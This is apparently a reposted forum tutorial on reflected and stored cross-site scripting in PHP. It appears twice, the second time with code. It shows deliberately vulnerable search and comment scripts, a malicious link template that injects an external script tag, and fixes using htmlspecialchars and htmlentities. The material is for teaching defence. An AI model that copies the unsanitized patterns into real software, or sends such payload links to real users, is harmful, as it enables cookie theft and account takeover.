XSS (Cross Site Scripting)
I posted this on Byteoverflow awhile ago and decided to post it here. I hope to do these for a bunch of different vulnerabilities. In this particular one I will be doing XSS AKA Cross Site Scripting. XSS vulnerabilities are often overlooked and considered useless. This is FAR from the case. XSS vulns are very dangerous and need to be taken serious just like SQLi vulns are. The possibilities are endless when it comes to XSS vulns. I will be discussing the two types of XSS vulns today, Persistent and Non Persistent. If you have any questions feel free to ask them here.
Non Persistent XSS vulnerabilities are when user input is not properly sanitized and used immediately after a request is made. These are generally not as dangerous, but definitely need to be addressed and taken care of. With Non Persistent vulns you would usually have to trick someone into clicking a link with the XSS payload. Whereas with persistent vulns the payload is embedded in a normal page and people can stumble across it without even knowing, we will talk more about that later. Here is a simple example of a Non Persistent XSS vulnerability. I will be doing a simple search script that uses GET for this example.
search.php
So in this simple code what's happening is it is taking the user input (the search value) then using it in a GET request to later use in a search query. To the average user this looks like a simple search that there is nothing wrong with.
But the user input is not being properly sanitized. The GET request is being used in an echo statement without being sanitized. That means users could input HTML and have it execute.
As you can see I was able to input HTML, in this case a font tag and have it execute. You can see when I submitted the form the font was red. This is a huge problem. This now allows attackers to input Javascript which can lead to Java Drive By's, Cookie Stealing, and many other exploits.
Again, you can see that the Javascript is getting executed. In this case it is just a simple alert, but it can be any Javascript payload an attacker might have. Now what makes this Non Persistent is it does not affect any person that goes to the search page. However if an attacker can get someone to click on a link it can affect them.
Now all an attacker would have to do is get the victim to click a link with their malicious payload.
http://example.com/search.php?squery= src='link to payload'></script>&search=Search
And they could always shorten the link to make it less obvious.
http://goo.gl/HAKnUV
Now let's look at where the vulnerability exists in the code and how to fix it.
So in those 2 lines of code what is happening is it's getting the user input via the squery GET value. It is then echoing it out to the user. We need to properly sanitize the $search_query variable before we use it in an echo. We can do this using htmlspecialchars or htmlentities.
Or
Now you can see instead of treating the variable as HTML and executing it, it is treating it as a string and completely ignoring the fact that it is HTML.
Persistent or stored XSS vulnerabilities occur when user input is stored on the server (usually in a DB) then later displayed on a page without proper sanitation. Persistent XSS vulnerabilities are much more dangerous than Non Persistent. These types of vulnerabilities don't require anyone to click a link or anything. They can just be browsing a site like normal and come across the malicious payload without even knowing. I will be showing you an example with a simple comments script.
Here is the simple script we will be using for an example.
So again, to the normal user this would look just like a normal comment section. In reality these comments are not being sanitized correctly.
As you can see the comment I posted is now red. This is very bad, people can now input their own HTML where it is stored in the DB and displayed to anyone that looks at that article.
Now anyone that goes to that article will see that alert box. This is a serious issue. These are obviously not what attackers would do though. They would embed their payload with a legit comment and you would never even know you hit it unless you view the source.
Now when someone would view that article they would see nothing fishy, but they would have executed the attackers payload.
If you inspect element the comment you can see that the Javascript is getting executed.
This is a huge issue and makes many innocent people victims and open for attack without even realizing what happened.
Let's take a look at where the vulnerability occurs.
Right there is where the code is fetching the comments from the database and displaying them to the user. The comments are not being sanitized properly before being echo'd out to the users. Again we can use htmlspecialchars or htmlentities to sanitize the comments.
Or
You can now see that the payload is no longer getting treated as HTML therefore not getting executed. Keep in mind these are just very simple examples I wrote up for this thread. Next time you are writing a web app or working on something please keep these in mind. These are always overlooked which is probably why they are so common. You can come across these everywhere! I was recently doing work for a client and found about 12 XSS vulnerabilities. 8 or 10 of them being persistent in their dashboard. Which meant someone could have inputted a cookie stealer and wait for them to load the page in the dashboard with the stealer. Then logged into their panel which would be BAD for them considering they were storing personal information of customers there. If you would like me to disclose my findings in that project let me know and I will be glad to. Anyway, I hope some of you understand more about XSS now and how to prevent it. It's a very easy thing to prevent, but at the same time people always forget about it. If I missed anything or you have anything to add feel free to post it here.
Nguồn: Google
Non Persistent
Non Persistent XSS vulnerabilities are when user input is not properly sanitized and used immediately after a request is made. These are generally not as dangerous, but definitely need to be addressed and taken care of. With Non Persistent vulns you would usually have to trick someone into clicking a link with the XSS payload. Whereas with persistent vulns the payload is embedded in a normal page and people can stumble across it without even knowing, we will talk more about that later. Here is a simple example of a Non Persistent XSS vulnerability. I will be doing a simple search script that uses GET for this example.
search.php
PHP Code:
<form action='' method='get'>
Search Value: <input type='text' name='squery'>
<input type='submit' name='search' value='Search'>
</form>
<?php if(isset($_GET['squery'])) {
$search_query = $_GET['squery'];
echo "Search results for $search_query:";
//Continue with search code here } ?>But the user input is not being properly sanitized. The GET request is being used in an echo statement without being sanitized. That means users could input HTML and have it execute.
As you can see I was able to input HTML, in this case a font tag and have it execute. You can see when I submitted the form the font was red. This is a huge problem. This now allows attackers to input Javascript which can lead to Java Drive By's, Cookie Stealing, and many other exploits.
Again, you can see that the Javascript is getting executed. In this case it is just a simple alert, but it can be any Javascript payload an attacker might have. Now what makes this Non Persistent is it does not affect any person that goes to the search page. However if an attacker can get someone to click on a link it can affect them.
Now all an attacker would have to do is get the victim to click a link with their malicious payload.
http://example.com/search.php?squery= src='link to payload'></script>&search=Search
And they could always shorten the link to make it less obvious.
http://goo.gl/HAKnUV
Now let's look at where the vulnerability exists in the code and how to fix it.
Code:
$search_query = $_GET['squery']; echo "Search results for $search_query:";
Code:
$search_query = htmlspecialchars($_GET['squery']); echo "Search results for $search_query:";
Code:
$search_query = htmlentities($_GET['squery']); echo "Search results for $search_query:";
Now you can see instead of treating the variable as HTML and executing it, it is treating it as a string and completely ignoring the fact that it is HTML.
Persistent (Stored)
Persistent or stored XSS vulnerabilities occur when user input is stored on the server (usually in a DB) then later displayed on a page without proper sanitation. Persistent XSS vulnerabilities are much more dangerous than Non Persistent. These types of vulnerabilities don't require anyone to click a link or anything. They can just be browsing a site like normal and come across the malicious payload without even knowing. I will be showing you an example with a simple comments script.
Here is the simple script we will be using for an example.
PHP Code:
<b><u><font size=6>Title</font></u></b>
<div id="content">
sadjasldjasd asdj asdj asdas<br>
d as<br>
dsad sadsaldjas<br>
dasdnasd ankd asd<br>
sadjalkjd ad asd<br>
asdlas djas d<br>
asd sadk sadj<br>
asd alsdksa dsadj sadj sad;lj sad<br>
sadna sdlasd<br>
</div><br><br>
<?php if(!mysql_connect("localhost", "root", "root")) {
die('MySQL connection failed!');
}
//Post comment stuff if(isset($_POST['submitcomment'])) {
$comment = mysql_real_escape_string($_POST['comment']);
if(mysql_query("INSERT INTO xss.comments (comment) VALUES ('".$comment."')")) {
echo "Comment posted!<br>";
} else {
echo "Failed to post comment!<br>";
}
}
echo "<b><u><font size=4>Comments</font></u></b><br>"; $get_comments = mysql_query("SELECT * FROM xss.comments");
if(mysql_num_rows($get_comments) == 0) {
echo "No comments to display!<br>";
} else {
while ($c = mysql_fetch_array($get_comments)) {
$comment = $c['comment'];
echo "$comment<hr>";
}
} ?> <form action='' method='post'>
Submit Comment:<br>
<textarea rows='4' cols='50' name='comment'></textarea><br>
<input type='submit' name='submitcomment' value='Post Comment'>
</form>As you can see the comment I posted is now red. This is very bad, people can now input their own HTML where it is stored in the DB and displayed to anyone that looks at that article.
Now anyone that goes to that article will see that alert box. This is a serious issue. These are obviously not what attackers would do though. They would embed their payload with a legit comment and you would never even know you hit it unless you view the source.
Now when someone would view that article they would see nothing fishy, but they would have executed the attackers payload.
If you inspect element the comment you can see that the Javascript is getting executed.
This is a huge issue and makes many innocent people victims and open for attack without even realizing what happened.
Let's take a look at where the vulnerability occurs.
Code:
while ($c = mysql_fetch_array($get_comments)) {
$comment = $c['comment'];
echo "$comment<hr>";
}
Code:
while ($c = mysql_fetch_array($get_comments)) {
$comment = htmlspecialchars($c['comment']);
echo "$comment<hr>";
}
Code:
while ($c = mysql_fetch_array($get_comments)) {
$comment = htmlentities($c['comment']);
echo "$comment<hr>";
}
You can now see that the payload is no longer getting treated as HTML therefore not getting executed. Keep in mind these are just very simple examples I wrote up for this thread. Next time you are writing a web app or working on something please keep these in mind. These are always overlooked which is probably why they are so common. You can come across these everywhere! I was recently doing work for a client and found about 12 XSS vulnerabilities. 8 or 10 of them being persistent in their dashboard. Which meant someone could have inputted a cookie stealer and wait for them to load the page in the dashboard with the stealer. Then logged into their panel which would be BAD for them considering they were storing personal information of customers there. If you would like me to disclose my findings in that project let me know and I will be glad to. Anyway, I hope some of you understand more about XSS now and how to prevent it. It's a very easy thing to prevent, but at the same time people always forget about it. If I missed anything or you have anything to add feel free to post it here.
Nguồn: Google
Comments
Post a Comment